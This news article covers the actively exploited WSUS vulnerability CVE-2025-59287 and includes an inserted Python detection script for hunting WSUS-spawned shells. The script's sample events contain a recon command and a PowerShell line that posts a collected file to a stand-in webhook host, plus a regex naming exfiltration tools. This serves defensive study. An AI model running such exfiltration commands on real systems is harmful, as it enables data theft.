Governments and private security experts have raised alarms regarding a significant vulnerability in Microsoft Windows Server Update Services (WSUS), which is reportedly being actively exploited. This flaw, identified as CVE-2025-59287, has been assigned a critical rating of 9.8 out of 10 on the CVSS scale and affects Windows Server versions from 2012 to 2025.
The vulnerability arises from insecure deserialization of untrusted data, enabling unauthenticated attackers to execute arbitrary code on susceptible systems. Notably, systems without the WSUS role enabled remain unaffected.
Microsoft initially addressed this issue with a patch on October 14, coinciding with “Patch Tuesday.” However, this patch did not fully resolve the vulnerability, prompting the company to release an emergency update later. Nonetheless, security researcher Kevin Beaumont has indicated that the latest out-of-band update is not entirely secure. He demonstrated that he could manipulate updates sent to client systems, potentially allowing for the distribution of malicious updates.
Beaumont stated, “I was able to tamper with the updates offered to the clients and push out malicious updates,” highlighting the risk posed by the vulnerability. He further noted that attackers could set deadlines for the installation of their payloads, enabling mass installations at specified times.
In light of these developments, the US Cybersecurity and Infrastructure Security Agency has added CVE-2025-59287 to its Known Exploited Vulnerabilities catalog, while the Dutch National Cybersecurity Center has issued warnings regarding ongoing exploitation activities. Experts have warned that if an unpatched WSUS instance is online, it is likely already compromised.
Private security firms, including Huntress, reported that attackers began targeting WSUS instances exposed on default ports as early as late October, exploiting the deserialization vulnerability through the AuthorizationCookie. The exploitation has involved utilizing the WSUS service binary to execute commands and gather sensitive information, which is then exfiltrated via a remote webhook. Attackers have employed proxy networks to obfuscate their activities, complicating detection efforts.
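The activity described above (the WSUS service process running commands, then posting the collected output to a remote webhook) is the kind of process lineage defenders can hunt for in endpoint telemetry. The following is an added detection example, not code from the article or from any of the firms it cites; it assumes WsusService.exe and the IIS worker w3wp.exe as the WSUS host processes, and runs over constructed Sysmon-style process-creation events.

```python
import re
from pathlib import PureWindowsPath

# Images assumed to host WSUS: the WsusService.exe Windows service and the
# w3wp.exe IIS worker that serves the WSUS web endpoints (assumption for this example).
WSUS_HOSTS = {"wsusservice.exe", "w3wp.exe"}
# Shells a patch-distribution service has no legitimate reason to launch.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line shape that posts data to an external URL (webhook-style exfil).
EXFIL_RE = re.compile(r"(invoke-webrequest|invoke-restmethod|iwr|irm|curl)\b.*?(https?://\S+)", re.I)

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def wsus_ancestor(ev: dict, by_pid: dict, max_depth: int = 5):
    """Walk the parent chain and return the WSUS host image name if one is found."""
    pid = ev["ppid"]
    for _ in range(max_depth):
        parent = by_pid.get(pid)
        if parent is None:
            return None
        if basename(parent["image"]) in WSUS_HOSTS:
            return basename(parent["image"])
        pid = parent["ppid"]
    return None

def triage(events: list) -> list:
    """Flag shells descended from a WSUS host, noting any webhook-style exfil."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        child = basename(ev["image"])
        root = wsus_ancestor(ev, by_pid) if child in SHELLS else None
        if root is None:
            continue
        finding = {"pid": ev["pid"], "child": child, "root": root}
        m = EXFIL_RE.search(ev["cmdline"])
        if m:
            finding["exfil_url"] = m.group(2)  # destination of the suspected exfil
        findings.append(finding)
    return findings

# Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 600, "image": r"C:\Program Files\Update Services\Service\WsusService.exe", "cmdline": "WsusService.exe"},
    {"pid": 2000, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r'cmd.exe /c "whoami & ipconfig /all > C:\Windows\Temp\o.txt"'},
    {"pid": 3000, "ppid": 2000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -c "Invoke-WebRequest -Uri https://webhook.example/collect -Method POST -InFile C:\Windows\Temp\o.txt"'},
    {"pid": 4000, "ppid": 700, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe"},
]
```

Running `triage(SAMPLE_EVENTS)` flags the cmd.exe and powershell.exe descended from WsusService.exe and attaches the webhook URL to the second, while the unrelated admin PowerShell session (pid 4000) is left alone.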
Huntress observed fewer than 25 vulnerable hosts during its investigations, noting that WSUS is not commonly exposed on these ports. WatchTowr CEO Benjamin Harris, however, expressed concern over the potential for widespread exploitation, stating, “If an unpatched WSUS instance is online, at this stage it has likely already been compromised.” He emphasized that organizations with exposed WSUS systems need to reassess their security posture.
The exploitation of this vulnerability presents a serious risk, especially for sensitive organizations that are often prime targets for attackers. Microsoft has not provided detailed responses to inquiries about the exploitation status and continues to assert that customers who have applied the latest updates are protected.
